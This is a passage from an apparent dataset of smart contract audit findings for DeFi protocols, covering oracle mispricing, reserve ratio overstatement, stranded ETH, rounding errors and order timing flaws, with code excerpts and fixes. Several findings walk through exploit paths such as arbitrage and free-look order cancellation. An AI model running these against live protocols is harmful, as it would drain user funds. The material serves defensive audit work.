oracle use in the AaveLeverageStragyExtension, if AAVE3 turns it on the extension will simply continue using its current oracles without accounting for the different prices.\\nWhen re-balancing the following code calculate the netBorrowLimit/netRepayLimit:\\n```\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue)) \\n .preciseDiv(netRepayLimit);\\n \\n```\\n\\nThe `_actionInfo.collateralValue` and `_adminInfo.borrowValue` are `_getAndValidateLeverageInfo()` where they are both retrieved based on the current set chainlink oracle.\\nWhen E-mode uses a single oracle price a de-pegging of one of the assets will lead to incorrect values of `netBorrowLimit` and `netRepayLimit` depending on which asset is de-pegging.\\n`collateralValue` or `borrowValue` can be either larger or smaller than how they are valued internally in AAVE3.чAave3LeverageStrategyExtension should take single oracle usage into account. `_calcualteMaxBorrowCollateral` should check if there is a discrepancy and adjust such that the `execute.unutilizedLeveragePercentage` safety parameter is honored.чWhen Levering\\nIf `collateralValue` is to valued higher than internally in AAVE3 OR If `borrowValue` is to valued lower than internally in AAVE3:\\nThe `netBorrowLimit` is larger than it should be we are essentially going to overriding `execute.unutilizedLeveragePercentage` and attempting to borrow more than we should.\\nIf `collateralValue` is valued lower than internally in AAVE3 OR If `borrowValue` is to valued higher than internally in AAVE3:\\nThe `netBorrowLimit` is smaller than it should be, we are not borrowing as much as we should. Levering up takes longer.\\nWhen Delevering\\nIf `collateralValue` is to valued higher than internally in AAVE3 OR If `borrowValue` is to valued lower than internally in AAVE3:\\nWe will withdraw more collateral and repay more than specified by `execution.unutilizedLeveragePercentage`.\\nIf `collateralValue` is valued lower than internally in AAVE3 OR If `borrowValue` is to valued higher than internally in AAVE3:\\nWe withdraw less and repay less debt than we should. This means that both `ripcord()` and `disengage()` are not functioning as they, they will not delever as fast they should. We can look at it as `execution.unutilizedLeveragePercentage` not being throttled.\\nThe above consequences show that important functionality is not working as expected. \"overriding\" `execution.unutilizedLeveragePercentage` is a serious safety concern.ч```\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue)) \\n .preciseDiv(netRepayLimit);\\n \\n```\\n -In case the portfolio makes a loss, the total reserves and reserve ratio will be inflated.чmediumчThe pool balance is transferred to the portfolio for investment, for example sending USDT to Curve/Aave/Balancer etc. to generate yield. However, there are risks associated with those protocols such as smart contract risks. In case a loss happens, it will not be reflected in the pool balance and the total reserve and reserve ratio will be inflated.\\nThe assets in the pool can be sent to the portfolio account to invest and earn yield. The amount of assets in the insurance pool and Unitas pool is tracked by the `_balance` variable. This amount is used to calculate the total reserve and total collateral, which then are used to calculate the reserve ratio.\\n```\\n uint256 tokenReserve = _getBalance(token);\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token);\\n```\\n\\nWhen there is a loss to the portfolio, there is no way to write down the `_balance` variable. This leads to an overstatement of the total reserve and reserve ratio.чAdd function to allow admin to write off the `_balance` in case of investment lost. Example:\\n```\\nfunction writeOff(address token, uint256 amount) external onlyGuardian {\\n\\n uint256 currentBalance = IERC20(token).balanceOf(address(this));\\n\\n // Require that the amount to write off is less than or equal to the current balance\\n require(amount <= currentBalance, \"Amount exceeds balance\");\\n _balance[token] -= amount;\\n\\n emit WriteOff(token, amount);\\n}\\n```\\nчOverstatement of the total reserve and reserve ratio can increase the risk for the protocol because of undercollateralization of assets.ч```\\n uint256 tokenReserve = _getBalance(token);\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token);\\n```\\n -USD1 is priced as $1 instead of being pegged to USDTчmediumчThe system treats 1 USD1 = $1 instead of 1 USD1 = 1 USDT which allows arbitrage opportunities.\\nTo swap from one token to another Unitas first get's the price of the quote token and then calculates the swap result. Given that we want to swap 1 USD1 for USDT, we have USDT as the quote token:\\n```\\n address priceQuoteToken = _getPriceQuoteToken(tokenIn, tokenOut);\\n price = oracle.getLatestPrice(priceQuoteToken);\\n _checkPrice(priceQuoteToken, price);\\n\\n feeNumerator = isBuy ? pair.buyFee : pair.sellFee;\\n feeToken = IERC20Token(priceQuoteToken == tokenIn ? tokenOut : tokenIn);\\n\\n SwapRequest memory request;\\n request.tokenIn = tokenIn;\\n request.tokenOut = tokenOut;\\n request.amountType = amountType;\\n request.amount = amount;\\n request.feeNumerator = feeNumerator;\\n request.feeBase = tokenManager.SWAP_FEE_BASE();\\n request.feeToken = address(feeToken);\\n request.price = price;\\n request.priceBase = 10 ** oracle.decimals();\\n request.quoteToken = priceQuoteToken;\\n\\n (amountIn, amountOut, fee) = _calculateSwapResult(request);\\n```\\n\\nSince `amountType == AmountType.In`, it executes _calculateSwapResultByAmountIn():\\n```\\n // When tokenOut is feeToken, subtracts the fee after converting the amount\\n amountOut = _convert(\\n request.tokenIn,\\n request.tokenOut,\\n amountIn,\\n MathUpgradeable.Rounding.Down,\\n request.price,\\n request.priceBase,\\n request.quoteToken\\n );\\n fee = _getFeeByAmountWithFee(amountOut, request.feeNumerator, request.feeBase);\\n amountOut -= fee;\\n```\\n\\nGiven that the price is 0.99e18, i.e. 1 USDT is worth $0.99, it calculates the amount of USDT we should receive as:\\n```\\n function _convertByFromPrice(\\n address fromToken,\\n address toToken,\\n uint256 fromAmount,\\n MathUpgradeable.Rounding rounding,\\n uint256 price,\\n uint256 priceBase\\n ) internal view virtual returns (uint256) {\\n uint256 fromBase = 10 ** IERC20Metadata(fromToken).decimals();\\n uint256 toBase = 10 ** IERC20Metadata(toToken).decimals();\\n\\n return fromAmount.mulDiv(price * toBase, priceBase * fromBase, rounding);\\n }\\n```\\n\\nGiven that:\\ntoBase = 10**6 = 1e6 (USDT has 6 decimals)\\nfromBase = 10**18 = 1e18 (USD1 has 18 decimals)\\npriceBase = 1e18\\nprice = 0.99e18 (1 USDT = $0.99)\\nfromAmount = 1e18 (we swap 1 USD1) we get: $1e18 * 0.99e18 * 1e6 / (1e18 * 1e18) = 0.99e6$\\nSo by redeeming 1 USD1 I only get back 0.99 USDT. The other way around, trading USDT for USD1, would get you 1.01 USD1 for 1 USDT: $1e6 * 1e18 * 1e18 / (0.99e18 * 1e6) = 1.01e18$\\nThe contract values USD1 at exactly $1 while USDT's price is variable. But, in reality, USD1 is not pegged to $1. It's pegged to USDT the only underlying asset.\\nThat allows us to do the following:\\nWith USDT back to $1 we get: $1.003009e+23 * 1e18 * 1e6 / (1e18 * 1e18) = 100300.9e6$\\nThat's a profit of 300 USDT. The profit is taken from other users of the protocol who deposited USDT to get access to the other stablecoins.ч1 USDT should always be 1 USD1. You treat 1 USD1 as $1 but that's not the case.чAn attacker can abuse the price variation of USDT to buy USD1 for cheap.ч```\\n address priceQuoteToken = _getPriceQuoteToken(tokenIn, tokenOut);\\n price = oracle.getLatestPrice(priceQuoteToken);\\n _checkPrice(priceQuoteToken, price);\\n\\n feeNumerator = isBuy ? pair.buyFee : pair.sellFee;\\n feeToken = IERC20Token(priceQuoteToken == tokenIn ? tokenOut : tokenIn);\\n\\n SwapRequest memory request;\\n request.tokenIn = tokenIn;\\n request.tokenOut = tokenOut;\\n request.amountType = amountType;\\n request.amount = amount;\\n request.feeNumerator = feeNumerator;\\n request.feeBase = tokenManager.SWAP_FEE_BASE();\\n request.feeToken = address(feeToken);\\n request.price = price;\\n request.priceBase = 10 ** oracle.decimals();\\n request.quoteToken = priceQuoteToken;\\n\\n (amountIn, amountOut, fee) = _calculateSwapResult(request);\\n```\\n -Users may not be able to fully redeem USD1 into USDT even when reserve ratio is above 100%чmediumчUsers may not be able to fully redeem USDT even when reserve ratio is above 100%, because of portfolio being taken into the account for calculation.\\nReserve ratio shows how many liabilities is covered by reserves, a reserve ratio above 100% guarantees protocol has enough USDT to redeem, the way of calculating reserve ratio is `Reserve Ratio = allReserves / liabilities` and is implemented in Unitas#_getReserveStatus(...) function:\\n```\\n reserveRatio = ScalingUtils.scaleByBases(\\n allReserves * valueBase / liabilities,\\n valueBase,\\n tokenManager.RESERVE_RATIO_BASE()\\n );\\n```\\n\\n`allReserves` is the sum of the balance of Unitas and InsurancePool, calculated in Unitas#_getTotalReservesAndCollaterals() function:\\n```\\n for (uint256 i; i < tokenCount; i++) {\\n address token = tokenManager.tokenByIndex(tokenTypeValue, i);\\n uint256 tokenReserve = _getBalance(token);\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token);\\n\\n\\n if (tokenReserve > 0 || tokenCollateral > 0) {\\n uint256 price = oracle.getLatestPrice(token);\\n\\n\\n reserves += _convert(\\n token,\\n baseToken,\\n tokenReserve,\\n MathUpgradeable.Rounding.Down,\\n price,\\n priceBase,\\n token\\n );\\n\\n\\n collaterals += _convert(\\n token,\\n baseToken,\\n tokenCollateral,\\n MathUpgradeable.Rounding.Down,\\n price,\\n priceBase,\\n token\\n );\\n }\\n }\\n```\\n\\n`liabilities` is the total value of USD1 and USDEMC tokens, calculated in Unitas#_getTotalLiabilities() function:\\n```\\n for (uint256 i; i < tokenCount; i++) {\\n address token = tokenManager.tokenByIndex(tokenTypeValue, i);\\n uint256 tokenSupply = IERC20Token(token).totalSupply();\\n\\n\\n if (token == baseToken) {\\n // Adds up directly when the token is USD1\\n liabilities += tokenSupply;\\n } else if (tokenSupply > 0) {\\n uint256 price = oracle.getLatestPrice(token);\\n\\n\\n liabilities += _convert(\\n token,\\n baseToken,\\n tokenSupply,\\n MathUpgradeable.Rounding.Down,\\n price,\\n priceBase,\\n token\\n );\\n }\\n }\\n```\\n\\nSome amount of USDT in both Unitas and InsurancePool is `portfolio`, which represents the current amount of assets used for strategic investments, it is worth noting that after sending `portfolio`, `balance` remains the same, which means `portfolio` is taken into account in the calculation of reserve ratio.\\nThis is problematic because `portfolio` is not available when user redeems, and user may not be able to fully redeem for USDT even when protocols says there is sufficient reserve ratio.\\nLet's assume :\\nUnitas's balance is 10000 USD and its portfolio is 2000 USD, avaliable balance is 8000 USD InsurancePool's balance is 3000 USD and its portfolio is 600 USD, available balance is 2400 USD AllReserves value is 13000 USD Liabilities (USDEMC) value is 10000 USD Reserve Ratio is (10000 + 3000) / 10000 = 130%.\\nLater on, USDEMC appreciates upto 10% and we can get:\\nAllReserves value is still 13000 USD Liabilities (USDEMC) value is 11000 USD Reserve Ratio is (10000 + 3000) / 11000 = 118%.\\nThe available balance in Unitas is 8000 USD so there is 3000 USD in short, it needs to be obtain from InsurancePool, however, the available balance in InsurancePool is 2400 USD, transaction will be reverted and users cannot redeem.\\nThere would also be an extreme situation when reserve ratio is above 100% but there is no available `balance` in protocol because all the `balance` is `portfolio` (this is possible when InsurancePool is drained out), users cannot redeem any USDT in this case.чPortfolio should not be taken into account for the calculation of reserve ratio.\\n```\\n function _getTotalReservesAndCollaterals() internal view returns (uint256 reserves, uint256 collaterals) {\\n // rest of code\\n// Remove the line below\\n uint256 tokenReserve = _getBalance(token);\\n// Add the line below\\n uint256 tokenReserve = _getBalance(token) // Remove the line below\\n _getPortfolio(token);\\n// Remove the line below\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token);\\n// Add the line below\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token) // Remove the line below\\n IInsurancePool(insurancePool).getPortfolio(token);\\n // rest of code\\n }\\n```\\nчUsers may not be able to fully redeem USD1 into USDT even when reserve ratio is above 100%, this defeats the purpose of reserve ratio and breaks the promise of the protocol, users may be mislead and lose funds.ч```\\n reserveRatio = ScalingUtils.scaleByBases(\\n allReserves * valueBase / liabilities,\\n valueBase,\\n tokenManager.RESERVE_RATIO_BASE()\\n );\\n```\\n -If any stable depegs, oracle will fail, disabling swapsчmediumчIf any stable depegs, oracle will fail, disabling swaps\\nWhen swapping, the price of the asset/stable is fetched from OracleX. After fetching the price, the deviation is checked in the `_checkPrice` function.\\nIf the price of an asset/stable depegs, the following require will fail:\\n```\\n _require(minPrice <= price && price <= maxPrice, Errors.PRICE_INVALID);\\n```\\n\\nDue to the fail in the deviation, any swapping activity will be disabled by default and transactions will not go throughчUse a secondary oracle when the first one fails and wrap the code in a try catch and store the last fetched price in a variableчCore functionality of the protocol will fail to work if any token they fetch depegs and its price goes outside the bounds.ч```\\n _require(minPrice <= price && price <= maxPrice, Errors.PRICE_INVALID);\\n```\\n -supplyNativeToken will strand ETH in contract if called after ACTION_DEFER_LIQUIDITY_CHECKчhighчsupplyNativeToken deposits msg.value to the WETH contract. This is very problematic if it is called after ACTION_DEFER_LIQUIDITY_CHECK. Since onDeferredLiqudityCheck creates a new context msg.value will be 0 and no ETH will actually be deposited for the user, causing funds to be stranded in the contract.\\nTxBuilderExtension.sol#L252-L256\\n```\\nfunction supplyNativeToken(address user) internal nonReentrant {\\n WethInterface(weth).deposit{value: msg.value}();\\n IERC20(weth).safeIncreaseAllowance(address(ironBank), msg.value);\\n ironBank.supply(address(this), user, weth, msg.value);\\n}\\n```\\n\\nsupplyNativeToken uses the context sensitive msg.value to determine how much ETH to send to convert to WETH. After ACTION_DEFER_LIQUIDITY_CHECK is called, it enters a new context in which msg.value is always 0. We can outline the execution path to see where this happens:\\n`execute > executeInteral > deferLiquidityCheck > ironBank.deferLiquidityCheck > onDeferredLiquidityCheck (new context) > executeInternal > supplyNativeToken`\\nWhen IronBank makes it's callback to TxBuilderExtension it creates a new context. Since the ETH is not sent along to this new context, msg.value will always be 0. Which will result in no ETH being deposited and the sent ether is left in the contract.\\nAlthough these funds can be recovered by the admin, it may can easily cause the user to be unfairly liquidated in the meantime since a (potentially significant) portion of their collateral hasn't been deposited. Additionally in conjunction with my other submission on ownable not being initialized correctly, the funds would be completely unrecoverable due to lack of owner.чmsg.value should be cached at the beginning of the function to preserve it across contextsчUser funds are indefinitely (potentially permanently) stuck in the contract. Users may be unfairly liquidated due to their collateral not depositing.ч```\\nfunction supplyNativeToken(address user) internal nonReentrant {\\n WethInterface(weth).deposit{value: msg.value}();\\n IERC20(weth).safeIncreaseAllowance(address(ironBank), msg.value);\\n ironBank.supply(address(this), user, weth, msg.value);\\n}\\n```\\n -PriceOracle.getPrice doesn't check for stale priceчmediumчPriceOracle.getPrice doesn't check for stale price. As result protocol can make decisions based on not up to date prices, which can cause loses.\\n```\\n function getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price > 0, \"invalid price\");\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n }\\n```\\n\\nThis function doesn't check that prices are up to date. Because of that it's possible that price is not outdated which can cause financial loses for protocol.чYou need to check that price is not outdated by checking round timestamp.чProtocol can face bad debt.ч```\\n function getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price > 0, \"invalid price\");\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n }\\n```\\n -PriceOracle will use the wrong price if the Chainlink registry returns price outside min/max rangeчmediumчChainlink aggregators have a built in circuit breaker if the price of an asset goes outside of a predetermined price band. The result is that if an asset experiences a huge drop in value (i.e. LUNA crash) the price of the oracle will continue to return the minPrice instead of the actual price of the asset. This would allow user to continue borrowing with the asset but at the wrong price. This is exactly what happened to Venus on BSC when LUNA imploded.\\nNote there is only a check for `price` to be non-negative, and not within an acceptable range.\\n```\\nfunction getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price > 0, \"invalid price\");\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n}\\n```\\n\\nA similar issue is seen here.чImplement the proper check for each asset. It must revert in the case of bad price.\\n```\\nfunction getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price >= minPrice && price <= maxPrice, \"invalid price\"); // @audit use the proper minPrice and maxPrice for each asset\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n}\\n```\\nчThe wrong price may be returned in the event of a market crash. An adversary will then be able to borrow against the wrong price and incur bad debt to the protocol.ч```\\nfunction getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price > 0, \"invalid price\");\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n}\\n```\\n -Wrong Price will be Returned When Asset is PToken for WstETHчmediumчIron Bank allows a PToken market to be created for an underlying asset in addition to a lending market. PTokens can be counted as user collaterals and their price is fetched based on their underlying tokens. However, wrong price will return when PToken's underlying asset is WstETH.\\nRetrieving price for WstETH is a 2 step process. WstETH needs to be converted to stETH first, then converted to ETH/USD. This is properly implemented when the market is WstETH through checking `if (asset==wsteth)`. But when PToken market is created for WstETH, this check will by bypassed because PToken contract address will be different from wsteth address.\\nPToken market price is set through `_setAggregators()` in PriceOracle.sol where base and quote token address are set and tested before writing into `aggregators` array. And note that quote token address can either be ETH or USD. When asset price is accessed through `getPrice()`, if the input asset is not `wsteth` address, `aggregators` is directly pulled to get chainlink price denominated in ETH or USD.\\n```\\n//PriceOracle.sol\\n//_setAggregators()\\n require(\\n aggrs[i].quote == Denominations.ETH ||\\n aggrs[i].quote == Denominations.USD,\\n \"unsupported quote\"\\n );\\n```\\n\\n```\\n//PriceOracle.sol\\n function getPrice(address asset) external view returns (uint256) {\\n if (asset == wsteth) {\\n uint256 stEthPrice = getPriceFromChainlink(\\n steth,\\n Denominations.USD\\n );\\n uint256 stEthPerToken = WstEthInterface(wsteth).stEthPerToken();\\n uint256 wstEthPrice = (stEthPrice * stEthPerToken) / 1e18;\\n return getNormalizedPrice(wstEthPrice, asset);\\n }\\n AggregatorInfo memory aggregatorInfo = aggregators[asset];\\n uint256 price = getPriceFromChainlink(\\n aggregatorInfo.base,\\n aggregatorInfo.quote\\n );\\n // rest of code\\n```\\n\\nThis creates a problem for PToken for WstETH, because `if (asset==wsteth)` will be bypassed and chainlink aggregator price will be returned. And chainlink doesn't have a direct price quote of WstETH/ETH or WstETH/USD, only WstETH/stETH or stETH/USD. This means most likely aggregator price for stETH/USD will be returned as price for WstETH.\\nSince stETH is a rebasing token, and WstETH:stETH is not 1 to 1, this will create a wrong valuation for users holding PToken for WstETH as collaterals.чIn `getPrice()`, consider adding another check whether the asset is PToken and its underlying asset is WstETH. If true, use the same bypass for pricing.чSince users holding PToken for WstETH will have wrong valuation, this potentially creates opportunities for malicious over-borrowing or unfair liquidations, putting the protocol at risk.ч```\\n//PriceOracle.sol\\n//_setAggregators()\\n require(\\n aggrs[i].quote == Denominations.ETH ||\\n aggrs[i].quote == Denominations.USD,\\n \"unsupported quote\"\\n );\\n```\\n -Limit swap orders can be used to get a free look into the futureчhighчUsers can cancel their limit swap orders to get a free look into prices in future blocks\\nThis is a part of the same issue that was described in the last contest. The sponsor fixed the bug for `LimitDecrease` and `StopLossDecrease`, but not for `LimitSwap`.\\nAny swap limit order submitted in block range N can't be executed until block range N+2, because the block range is forced to be after the submitted block range, and keepers can't execute until the price has been archived, which necessarily won't be until after block range N+1. Consider what happens when half of the oracle's block ranges are off from the other half, e.g.:\\n```\\n 1 2 3 4 5 6 7 8 9 < block number\\nO1: A B B B B C C C D\\nA A B B B B C C C\\n^^ grouped oracle block ranges\\n```\\n\\nAt block 1, oracles in both groups (O1 and O2) are in the same block range A, and someone submits a large swap limit order (N). At block 6, oracles in O1 are in N+2, but oracles in O2 are still in N+1. This means that the swap limit order will execute at the median price of block 5 (since the earliest group to have archive prices at block 6 for N+1 will be O1) and market swap order submitted at block 6 in the other direction will execute at the median price of block 6 since O2 will be the first group to archive a price range that will contain block 6. By the end of block 5, the price for O1 is known, and the price that O2 will get at block 6 can be predicted with high probability (e.g. if the price has just gapped a few cents), so a trader will know whether the two orders will create a profit or not. If a profit is expected, they'll submit the market order at block 6. If a loss is expected, they'll cancel the swap limit order from block 1, and only have to cover gas fees.\\nEssentially the logic is that limit swap orders will use earlier prices, and market orders (with swaps) will use later prices, and since oracle block ranges aren't fixed, an attacker is able to know both prices before having their orders executed, and use large order sizes to capitalize on small price differences.чIssue Limit swap orders can be used to get a free look into the future\\nAll orders should follow the same block range rulesчThere is a lot of work involved in calculating statistics about block ranges for oracles and their processing time/queues, and ensuring one gets the prices essentially when the keepers do, but this is likely less work than co-located high frequency traders in traditional finance have to do, and if there's a risk free profit to be made, they'll put in the work to do it every single time, at the expense of all other traders.ч```\\n 1 2 3 4 5 6 7 8 9 < block number\\nO1: A B B B B C C C D\\nA A B B B B C C C\\n^^ grouped oracle block ranges\\n```\\n -User can loose funds in case if swapping in DecreaseOrderUtils.processOrder will failчmediumчWhen user executes decrease order, then he provides `order.minOutputAmount` value, that should protect his from loses. This value is provided with hope that swapping that will take some fees will be executed. But in case if swapping will fail, then this `order.minOutputAmount` value will be smaller then user would like to receive in case when swapping didn't occur. Because of that user can receive less output amount.\\n`DecreaseOrderUtils.processOrder` function executed decrease order and returns order execution result which contains information about output tokens and amounts that user should receive.\\n```\\n try params.contracts.swapHandler.swap(\\n SwapUtils.SwapParams(\\n params.contracts.dataStore,\\n params.contracts.eventEmitter,\\n params.contracts.oracle,\\n Bank(payable(order.market())),\\n params.key,\\n result.outputToken,\\n result.outputAmount,\\n params.swapPathMarkets,\\n 0,\\n order.receiver(),\\n order.uiFeeReceiver(),\\n order.shouldUnwrapNativeToken()\\n )\\n ) returns (address tokenOut, uint256 swapOutputAmount) {\\n `(\\n params.contracts.oracle,\\n tokenOut,\\n swapOutputAmount,\\n order.minOutputAmount()\\n );\\n } catch (bytes memory reasonBytes) {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n\\n _handleSwapError(\\n params.contracts.oracle,\\n order,\\n result,\\n reason,\\n reasonBytes\\n );\\n }\\n }\\n```\\n\\n```\\n null(\\n Oracle oracle,\\n Order.Props memory order,\\n DecreasePositionUtils.DecreasePositionResult memory result,\\n string memory reason,\\n bytes memory reasonBytes\\n ) internal {\\n emit SwapUtils.SwapReverted(reason, reasonBytes);\\n\\n _validateOutputAmount(\\n oracle,\\n result.outputToken,\\n result.outputAmount,\\n order.minOutputAmount()\\n );\\n\\n MarketToken(payable(order.market())).transferOut(\\n result.outputToken,\\n order.receiver(),\\n result.outputAmount,\\n order.shouldUnwrapNativeToken()\\n );\\n }\\n```\\n\\nAs you can see in this case `_validateOutputAmount` function will be called as well, but it will be called with `result.outputAmount` this time, which is amount provided by decreasing of position.\\nNow i will describe the problem. In case if user wants to swap his token, he knows that he needs to pay fees to the market pools and that this swap will eat some amount of output. So in case if `result.outputAmount` is 100$ worth of tokenA, it's fine if user will provide slippage as 3% if he has long swap path, so his slippage is 97$. But in case when swap will fail, then now this slippage of 97$ is incorrect as user didn't do swapping and he should receiev exactly 100$ worth of tokenA.\\nAlso i should note here, that it's easy to make swap fail for keeper, it's enough for him to just not provide any asset price, so swap reverts. So keeper can benefit on this slippage issue.чIssue User can loose funds in case if swapping in DecreaseOrderUtils.processOrder will fail\\nMaybe it's needed to have another slippage param, that should be used in case of no swapping.чUser can be frontruned to receive less amount in case of swapping error.ч```\\n try params.contracts.swapHandler.swap(\\n SwapUtils.SwapParams(\\n params.contracts.dataStore,\\n params.contracts.eventEmitter,\\n params.contracts.oracle,\\n Bank(payable(order.market())),\\n params.key,\\n result.outputToken,\\n result.outputAmount,\\n params.swapPathMarkets,\\n 0,\\n order.receiver(),\\n order.uiFeeReceiver(),\\n order.shouldUnwrapNativeToken()\\n )\\n ) returns (address tokenOut, uint256 swapOutputAmount) {\\n `(\\n params.contracts.oracle,\\n tokenOut,\\n swapOutputAmount,\\n order.minOutputAmount()\\n );\\n } catch (bytes memory reasonBytes) {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n\\n _handleSwapError(\\n params.contracts.oracle,\\n order,\\n result,\\n reason,\\n reasonBytes\\n );\\n }\\n }\\n```\\n -MarketUtils.getFundingAmountPerSizeDelta() has a rounding logical error.чmediumч`MarketUtils.getFundingAmountPerSizeDelta()` has a rounding logical error. The main problem is the divisor always use a roundupDivision regardless of the input `roundUp` rounding mode. Actually the correct use should be: the divisor should use the opposite of `roundup` to achieve the same logic of rounding.\\n`MarketUtils.getFundingAmountPerSizeDelta()` is used to calculate the `FundingAmountPerSizeDelta` with a roundup input mode parameter.\\nThis function is used for example by the IncreaseLimit order via flow `OrderHandler.executeOrder() -> _executeOrder() -> OrderUtils.executeOrder() -> processOrder() -> IncreaseOrderUtils.processOrder() -> IncreasePositionUtils.increasePosition() -> PositionUtils.updateFundingAndBorrowingState() -> MarketUtils.updateFundingAmoutPerSize() -> getFundingAmountPerSizeDelta()`.\\nHowever, the main problem is the divisor always use a roundupDivision regardless of the input `roundUp` rounding mode. Actually the correct use should be: the divisor should use the opposite of `roundup` to achieve the same logic of rounding.\\nMy POC code confirms my finding: given fundingAmount = 2e15, openInterest = 1e15+1, and roundup = true, the correct answer should be: 1999999999999998000000000000001999999999999999. However, the implementation returns the wrong solution of : 1000000000000000000000000000000000000000000000. The reason is that the divisor uses a roundup and gets a divisor of 2, as a result, the final result is actually rounded down rather than rounding up!\\n```\\nfunction testGetFundingAmountPerSizeDelta() public{\\n uint result = MarketUtils.getFundingAmountPerSizeDelta(2e15, 1e15+1, true);\\n console2.log(\"result: %d\", result);\\n uint256 correctResult = 2e15 * 1e15 * 1e30 + 1e15; // this is a real round up\\n correctResult = correctResult/(1e15+1);\\n console2.log(\"correctResult: %d\", correctResult);\\n assertTrue(result == 1e15 * 1e30);\\n }\\n```\\nчChange the rounding mode of the divisor to the opposite of the input `roundup` mode. Or, the solution can be just as follows:\\n```\\nfunction getFundingAmountPerSizeDelta(\\n uint256 fundingAmount,\\n uint256 openInterest,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n if (fundingAmount == 0 || openInterest == 0) { return 0; }\\n \\n \\n\\n // how many units in openInterest\\n// Remove the line below\\n uint256 divisor = Calc.roundUpDivision(openInterest, Precision.FLOAT_PRECISION_SQRT);\\n\\n// Remove the line below\\n return Precision.toFactor(fundingAmount, divisor, roundUp);\\n// Add the line below\\n return Precision.toFactor(fundingAmount*Precision.FLOAT_PRECISION_SQRT, openInterest, roundUp\\n }\\n```\\nчMarketUtils.getFundingAmountPerSizeDelta() has a rounding logical error, sometimes, when roundup = true, the result, instead of rounding up, it becomes a rounding down!ч```\\nfunction testGetFundingAmountPerSizeDelta() public{\\n uint result = MarketUtils.getFundingAmountPerSizeDelta(2e15, 1e15+1, true);\\n console2.log(\"result: %d\", result);\\n uint256 correctResult = 2e15 * 1e15 * 1e30 + 1e15; // this is a real round up\\n correctResult = correctResult/(1e15+1);\\n console2.log(\"correctResult: %d\", correctResult);\\n assertTrue(result == 1e15 * 1e30);\\n }\\n```\\n -PositionUtils.validatePosition() uses ``isIncrease`` instead of ``false`` when calling isPositionLiquidatable(), making it not work properly for the case of ``isIncrease = true``.чmediumч`PositionUtils.validatePosition()` uses `isIncrease` instead of `false` when calling `isPositionLiquidatable()`, making it not work properly for the case of `isIncrease` = true. The main problem is that when calling `isPositionLiquidatable()`, we should always consider decreasing the position since we are proposing a liquidation trade (which is a decrease in position). Therefore, it should not use `isIncrease` for the input parameter for `isPositionLiquidatable()`. We should always use `false` instead.\\n`PositionUtils.validatePosition()` is called to validate whether a position is valid in both collateral size and position size, and in addition, to check if the position is liquidable:\\nIt calls function `isPositionLiquidatable()` to check if a position is liquidable. However, it passes the `isIncrease` to function `isPositionLiquidatable()` as an argument. Actually, the `false` value should always be used for calling function `isPositionLiquidatable()` since a liquidation is always a decrease position operation. A position is liquidable or not has nothing to do with exiting trade operations and only depend on the parameters of the position per se.\\nCurrent implementation has a problem for an increase order: Given a Increase order, for example, increase a position by $200, when `PositionUtils.validatePosition()` is called, which is after the position has been increased, we should not consider another $200 increase in `isPositionLiquidatable()` again as part of the price impact calculation. This is double-accouting for price impact calculation, one during the position increasing process, and another in the position validation process. On the other hand, if we use `false` here, then we are considering a decrease order (since a liquidation is a decrease order) and evaluate the hypothetical price impact if the position will be liquidated.\\nOur POC code confirms my finding: intially, we don't have any positions, after executing a LimitIncrease order, the priceImpactUsd is evaluaed as follows (notice initialDiffUsd = 0):\\nPositionPricingUtils.getPriceImpactUsd started... openInterestParams.longOpenInterest: 0 openInterestParams.shortOpenInterest: 0 initialDiffUsd: 0 nextDiffUsd: 1123456700000000000000000000000 positiveImpactFactor: 50000000000000000000000 negativeImpactFactor: 100000000000000000000000 